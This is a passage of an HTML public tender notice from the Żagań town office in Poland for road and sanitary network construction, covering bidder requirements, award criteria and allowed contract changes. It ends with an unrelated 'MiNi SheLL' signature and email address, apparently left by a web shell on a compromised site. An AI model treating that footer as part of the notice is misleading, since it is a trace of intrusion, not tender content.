Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów (i w tym zakresie składa stosowne oświadczenie ), chyba że za  nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie sytuacji ekonomicznej i finansowej,   Zamawiający  żąda aby Wykonawca  znajdował się w sytuacji finansowej zapewniającej wykonanie zamówienia  i posiadał   ubezpieczenie od  odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem  zamówienia. 
Na potwierdzenie spełnienia tego warunku Wykonawca złoży opłacona polisę OC, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wykazania i złożenia poświadczeń o należytym  bądź nienależytym wykonaniu zamówień wymienionych w wykazie, dotyczy najważniejszych robót, określonych w punkcie 5.5 podpunkt  2 SIWZ :  co najmniej  1 łączna  robota budowalna   odpowiadająca swoim zakresem  i wartością robotom stanowiącym przedmiot zamówienia, polegająca  na budowie /przebudowie  drogi  o   nawierzchni z betonu asfaltowego o powierzchni nie mniejszej jak 2500 m2,  z kostki betonowej brukowej lub kamiennej o powierzchni nie mniejszej niż 1000 m2, z odwodnieniem oraz  wykonanie sieci zewnętrznej instalacji sanitarnej o długości nie mniejszej niż 400 mb
lub : 
-co najmniej 3 roboty - po jednej na każde wymienione zadanie - takie jak :  budowa/przebudowa  drogi  o   nawierzchni z betonu asfaltowego o powierzchni nie mniejszej jak 2500 m2;  budowa /przebudowa  drogi  o   nawierzchni z kostki betonowej brukowej lub kamiennej o powierzchni nie mniejszej niż 1000 m2, z odwodnieniem;  wykonanie  sieci zewnętrznej instalacji sanitarnej o długości nie mniejszej niż 400 mb.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres Gwaracji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w  stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie  :
1. Zmiany  zakresu świadczenia w przypadku - rezygnacji z wykonania części przedmiotu umowy - wykonawcy z tego tytułu nie przysługują żadne roszczenia, w tym prawo do odszkodowania.

2. Zmiany w dokumentacji projektowej- wystąpiła konieczność usunięcia wad lub wprowadzenia zmian w dokumentacji projektowej. Nie usunięcie wad lub nie wprowadzenie zmian w dokumentacji projektowej zagraża prawidłowości  wykonania przedmiotu zamówienia. 
Strona inicjująca konieczność  zmiany  w dokumentacji projektowej  przedstawia projekt zamienny zawierający opis proponowanych zmian.

3. Zmiany terminu wykonania przedmiotu umowy lub jej części, przy czym zmiana spowodowana może być okolicznościami leżącymi wyłącznie po stronie zamawiającego lub okolicznościami niezależnymi zarówno od zamawiającego jak i od wykonawcy skutkującymi koniecznością przedłużenia terminu wykonania przedmiotu umowy, w przypadku:
- nieterminowego przekazania przez Zamawiającego terenu budowy, 
- opóźnienia w dokonywaniu odbiorów z przyczyn leżących po stronie Zamawiającego,
- wystąpienia konieczności usunięcia wad lub wprowadzenia zmian w dokumentacji projektowej, jeżeli usunięcia wad lub konieczność wprowadzenia zmian w dokumentacji projektowej ma wpływ na termin wykonania umowy, 
- konieczności zlecenia wykonania zamówienia dodatkowego na podstawie art. 67 ust.1 pkt.5 ustawy Pzp, którego wykonanie ma wpływ na zmianę terminu realizacji robót objętych niniejszą umową, 
- gdy Zamawiający poleci wykonawcy przerwanie wykonywania przedmiotu umowy (nie wynikające z winy wykonawcy), 
- wykopalisk archeologicznych, niewypałów lub niewybuchów, 
- niesprzyjających warunków atmosferycznych, nietypowych dla danej pory roku, uniemożliwiających wykonywanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów,
- wstrzymania prowadzonych robót poprzez akty władzy i administracji publicznej o ile żądanie lub nakaz nie nastąpił z winy wykonawcy.

3a. Warunki tej zmiany :   wpis w dzienniku budowy inspektora nadzoru inwestorskiego lub przedstawiciela zamawiającego o braku możliwości prowadzenia robót budowlanych ze wskazaniem przyczyn uniemożliwiających ich prowadzenie.
3b. Okres przesunięcia terminu zakończenia  równy będzie okresowi przerwy lub przestoju; 

4.  Zmiany wynagrodzenia  ryczałtowego Wykonawcy, w przypadku: 
- ustawowej zmiany stawki podatku VAT, 
- rezygnacji z części robót, o wartość robót, które nie zostaną wykonane, zlecenia wykonania robót zamiennych będących następstwem usunięcia wad lub wprowadzenia zmian w dokumentacji projektowej, o różnicę pomiędzy wartością robót zamiennych a wartością robót, które nie będą wykonywane, podstawę do obliczenia kosztów zmiany mającej wpływ na wynagrodzenia wykonawcy stanowić będzie zatwierdzony przez zamawiającego kosztorys opracowany na podstawie cen jednostkowych lub danych wyjściowych do kosztorysowania przyjętych do kosztorysu ofertowego wykonawcy. 
Wykonawca przyjmie ceny materiałów wg cen zakupu i pracy sprzętu wg faktycznie poniesionych kosztów lecz nie wyższe niż średnie ceny materiałów i pracy sprzętu wg SEKOCENBUDU dla rejonu lubuskiego, dla kwartału poprzedzającego kwartał, w którym wykonywane są roboty.

5. Zmiana  w zakresie podwykonawstwa: 
- w zakresie zmiany lub rezygnacji z podwykonawcy :na którego zasoby Wykonawca    powoływał się w celu wykazania spełnienia warunków  udziału w postepowaniu, lub z którym zawarto umowę o podwykonawstwo w trakcie realizacji zamówienia publicznego,   pod warunkiem, że Wykonawca  wykaże, iż proponowany inny podwykonawca spełni warunki udziału w  postepowaniu w stopniu nie mniejszym niż wymagany w trakcie postepowania o udzielenie zamówienia; lub  Wykonawca  wykaże,  iż samodzielnie spełni warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postpowania o udzielenie zamówienia; 
- w zakresie  zmiany wskazanych w ofercie części  lub wprowadzenia nowych części przedmiotu umowy, które będą realizowane przy udziale podwykonawców.

6. Zmiany w zakresie personelu Wykonawcy : 
1) Zamawiający może żądać zmiany osoby pełniącej funkcję kierownika budowy oraz kierownika robót jeżeli uzna, że osoba ta nie wykonuje należycie swoich obowiązków. Wykonawca zobowiązany jest zmienić wskazaną osobę na inną spełniającą wymagania określone przez Zamawiającego w SIWZ  w terminie 7 dni od dnia otrzymania żądania Zamawiającego; 
2) Zmiana osoby pełniącej funkcję kierownika budowy oraz kierownika robót może nastąpić poprzez pisemne oświadczenie złożone drugiej stronie. Zmiana taka nie wymaga do swojej ważności formy aneksu do niniejszej umowy. Zmiana osoby pełniącej w/w funkcje następuje poprzez pisemne powiadomienie zamawiającego, do którego dołącza się dokumenty potwierdzające określone w SIWZ  wymagania stawiane dla tej osoby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl      BIP zakladka przyetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy  
Urząd Miasta Żagań 68-100 Żagań. ul. Jana Pawła II 15 pok. nr 20 Wydział Zamówień Publicznych i Nadzoru Właścicielskiego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2016 godzina 11:00, miejsce: Urząd Miasta Żagań 68-100 Żagań. ul. Jana Pawła II 15 pok. nr 20 Wydział Zamówień Publicznych i Nadzoru Właścicielskiego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com